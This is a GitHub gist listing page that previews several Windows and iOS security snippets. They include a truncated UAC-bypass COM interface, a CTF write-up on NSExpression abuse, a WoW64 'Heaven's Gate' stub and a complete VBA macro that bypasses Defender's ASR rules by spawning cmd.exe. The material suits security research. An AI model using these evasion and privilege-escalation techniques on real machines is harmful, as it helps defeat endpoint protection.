Skip to content

Instantly share code, notes, and snippets.

View Coldzer0's full-sized avatar
:shipit:
Task failed successfully

Coldzer0 Coldzer0

:shipit:
Task failed successfully
468 followers · 220 following
View GitHub Profile
@hfiref0x
hfiref0x / akagi_58a.c
Created October 23, 2019 16:27
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@saelo
saelo / writeup.md
Last active February 21, 2023 14:37
Writeup for the "Dezhou Instrumentz" challenge from the Real World CTF Qualifier 2019

Dezhou Instrumentz

The challenge consisted of an iOS app (Calc.app) which implemented a simple calculator. Moreover, the app also registered a custom URL scheme (icalc://) which would simply evaluate the content of the URL. The calculator was implemented using NSExpressions and the input string would simply be parsed as such an expression and executed. NSExpressions are pretty powerful and allow for example calls to ObjC Methods (e.q. typing in sqrt(42) would end up calling +[_NSPredicateUtilities sqrt:@42]). Further, there are two interesting helper functions available in NSExpressions:

FUNCTION(obj, 'foo', "bar")

Which will result in a call of the method 'foo' on object obj with parameter "bar" (an NSString).

@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active March 3, 2024 22:28
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@AhnMo
AhnMo / http_client_get.cc
Last active March 15, 2024 09:50
Wininet HTTP Client Example
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment (lib, "Wininet.lib")
int main(int argc, char *argv[]) {
HINTERNET hSession = InternetOpen(
L"Mozilla/5.0", // User-Agent
@lucasg
lucasg / apisetlookup.c
Last active November 9, 2023 10:14
Api set library lookup resolver
#include <windows.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <sal.h>
#include <assert.h>
#ifdef _X86_
#error "This snippet only build in 64-bit due to heavy use of uintptr arithmetics."
#endif
@Cr4sh
Cr4sh / WoW64_call.cpp
Created May 22, 2014 19:33
WoW64 Heaven's Gate
#include "stdafx.h"
#define DB(_val_) __asm __emit (_val_)
#define INVALID_SYSCALL (DWORD)(-1)
// code selectors
#define CS_32 0x23
#define CS_64 0x33
@martok
martok / SystemExceptionHandling.pas
Created September 10, 2013 23:06
Custom exception handler for use with FPC
unit SystemExceptionHandling;
// Inspired by what is described at FPC's forums:
// http://bugs.freepascal.org/view.php?id=12974 [^]
//
// especially in comment 0040683 by Bernd Kreuss
{$mode objfpc}{$H+}
{$AsmMode intel}